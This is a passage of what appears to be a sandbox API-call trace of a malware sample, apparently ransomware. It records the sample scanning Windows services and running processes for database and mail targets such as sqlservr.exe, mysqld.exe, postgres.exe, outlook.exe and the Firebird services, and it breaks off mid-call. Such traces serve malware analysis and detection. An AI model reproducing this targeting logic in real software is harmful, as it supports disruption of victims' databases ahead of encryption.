(lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0035.393] lstrlenW (lpString="DcomLaunch") returned 10 [0035.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0035.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0035.393] lstrlenW (lpString="Dhcp") returned 4 [0035.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0035.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0035.393] lstrlenW (lpString="Dnscache") returned 8 [0035.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0035.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0035.393] lstrlenW (lpString="DPS") returned 3 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0035.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0035.394] lstrlenW (lpString="eventlog") returned 8 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0035.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0035.394] lstrlenW (lpString="EventSystem") returned 11 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0035.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0035.394] lstrlenW (lpString="gpsvc") returned 5 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0035.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0035.394] lstrlenW (lpString="iphlpsvc") returned 8 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0035.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0035.394] lstrlenW (lpString="LanmanServer") returned 12 [0035.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0035.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0035.394] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0035.394] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0035.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0035.395] lstrlenW (lpString="LanmanWorkstation") returned 17 [0035.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0035.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0035.395] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0035.395] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0035.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0035.395] lstrlenW (lpString="lmhosts") returned 7 [0035.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0035.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0035.395] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0035.395] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0035.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0035.395] lstrlenW (lpString="MMCSS") returned 5 [0035.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0035.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0035.395] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0035.395] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0035.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0035.395] lstrlenW (lpString="MpsSvc") returned 6 [0035.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0035.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0035.395] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0035.395] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0035.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0035.396] lstrlenW (lpString="Netman") returned 6 [0035.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0035.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0035.396] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0035.396] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0035.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0035.396] lstrlenW (lpString="netprofm") returned 8 [0035.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0035.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0035.396] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0035.396] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0035.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0035.396] lstrlenW (lpString="NlaSvc") returned 6 [0035.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0035.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0035.396] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0035.396] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0035.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0035.396] lstrlenW (lpString="nsi") returned 3 [0035.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0035.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0035.396] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0035.396] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0035.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0035.396] lstrlenW (lpString="PcaSvc") returned 6 [0035.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0035.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0035.396] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0035.396] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0035.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0035.396] lstrlenW (lpString="PlugPlay") returned 8 [0035.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0035.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0035.396] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0035.397] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0035.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0035.397] lstrlenW (lpString="Power") returned 5 [0035.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0035.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0035.397] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0035.397] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0035.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0035.397] lstrlenW (lpString="ProfSvc") returned 7 [0035.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0035.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0035.397] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0035.397] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0035.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0035.397] lstrlenW (lpString="RpcEptMapper") returned 12 [0035.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0035.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0035.397] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0035.397] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0035.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0035.397] lstrlenW (lpString="RpcSs") returned 5 [0035.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0035.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0035.397] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0035.397] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0035.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0035.397] lstrlenW (lpString="SamSs") returned 5 [0035.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0035.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0035.397] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0035.397] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0035.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0035.397] lstrlenW (lpString="Schedule") returned 8 [0035.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0035.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0035.398] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0035.398] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0035.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0035.398] lstrlenW (lpString="SENS") returned 4 [0035.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0035.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0035.398] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0035.398] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0035.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0035.398] lstrlenW (lpString="ShellHWDetection") returned 16 [0035.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0035.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0035.398] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0035.398] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0035.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0035.398] lstrlenW (lpString="Spooler") returned 7 [0035.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0035.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0035.398] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0035.398] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0035.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0035.398] lstrlenW (lpString="SysMain") returned 7 [0035.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0035.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0035.398] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0035.398] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0035.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0035.398] lstrlenW (lpString="Themes") returned 6 [0035.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0035.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0035.398] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0035.398] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0035.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0035.399] lstrlenW (lpString="TrkWks") returned 6 [0035.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0035.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0035.399] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0035.399] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0035.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0035.399] lstrlenW (lpString="UxSms") returned 5 [0035.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0035.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0035.399] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0035.399] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0035.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0035.399] lstrlenW (lpString="WdiServiceHost") returned 14 [0035.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0035.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0035.399] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0035.399] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0035.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0035.399] lstrlenW (lpString="WdiSystemHost") returned 13 [0035.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0035.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0035.399] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0035.399] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0035.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0035.399] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0035.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0035.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0035.399] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0035.399] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0035.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0035.399] lstrlenW (lpString="Winmgmt") returned 7 [0035.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0035.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0035.400] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0035.400] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0035.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0035.400] lstrlenW (lpString="WPDBusEnum") returned 10 [0035.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0035.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0035.400] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0035.400] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0035.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0035.400] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63e060 | out: hHeap=0x5f0000) returned 1 [0035.400] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b8 [0035.402] Process32FirstW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0035.403] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0035.404] lstrlenW (lpString="System") returned 6 [0035.404] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0035.404] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0035.404] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0035.404] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0035.404] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0035.404] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0035.404] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0035.404] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0035.404] lstrlenW (lpString="smss.exe") returned 8 [0035.405] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0035.405] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0035.405] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0035.405] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0035.405] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0035.405] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0035.405] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0035.405] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0035.405] lstrlenW (lpString="csrss.exe") returned 9 [0035.405] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0035.405] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0035.405] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0035.406] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0035.406] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0035.406] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0035.406] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0035.406] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0035.406] lstrlenW (lpString="wininit.exe") returned 11 [0035.406] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0035.406] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0035.406] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0035.406] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0035.406] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0035.406] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0035.406] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0035.407] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0035.407] lstrlenW (lpString="csrss.exe") returned 9 [0035.407] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0035.407] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0035.407] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0035.407] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0035.407] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0035.407] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0035.407] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0035.408] lstrlenW (lpString="winlogon.exe") returned 12 [0035.408] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0035.409] lstrlenW (lpString="services.exe") returned 12 [0035.409] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0035.410] lstrlenW (lpString="lsass.exe") returned 9 [0035.410] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0035.411] lstrlenW (lpString="lsm.exe") returned 7 [0035.411] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.411] lstrlenW (lpString="svchost.exe") returned 11 [0035.411] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.412] lstrlenW (lpString="svchost.exe") returned 11 [0035.412] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.413] lstrlenW (lpString="svchost.exe") returned 11 [0035.413] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.413] lstrlenW (lpString="svchost.exe") returned 11 [0035.414] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.414] lstrlenW (lpString="svchost.exe") returned 11 [0035.414] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0035.415] lstrlenW (lpString="audiodg.exe") returned 11 [0035.415] Process32NextW (in: hSnapshot=0x1b8, 